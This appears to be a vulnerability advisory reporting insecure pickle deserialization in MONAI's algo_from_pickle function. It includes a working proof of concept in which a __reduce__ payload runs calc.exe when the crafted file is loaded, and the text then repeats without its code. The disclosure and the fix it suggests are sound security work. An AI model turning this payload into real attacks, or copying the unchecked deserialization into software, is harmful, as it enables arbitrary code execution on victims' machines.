Summary
The algo_from_pickle function in monai/auto3dseg/utils.py causes pickle.loads(data_bytes) to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.
Details
poc
import pickle
import subprocess
class MaliciousAlgo:
def __reduce__(self):
return (subprocess.call, (['calc.exe'],))
malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
"algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
f.write(pickle.dumps(attack_data))
Generate the malicious file "attack_algo.pkl" through POC.
from monai.auto3dseg.utils import algo_from_pickle
attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
Ultimately, it will trigger pickle.load through a file to identify the command execution.
Causes of the vulnerability:
def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
with open(pkl_filename, "rb") as f_pi:
data_bytes = f_pi.read()
data = pickle.loads(data_bytes)
Impact
Arbitrary code execution
Repair suggestions
Verify the data source and content before deserializing, or use a safe deserialization method
hnking-star Reporter
Summary
The
algo_from_picklefunction inmonai/auto3dseg/utils.pycausespickle.loads(data_bytes)to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.Details
poc
Generate the malicious file "attack_algo.pkl" through POC.
Ultimately, it will trigger pickle.load through a file to identify the command execution.
Causes of the vulnerability:
Impact
Arbitrary code execution
Repair suggestions
Verify the data source and content before deserializing, or use a safe deserialization method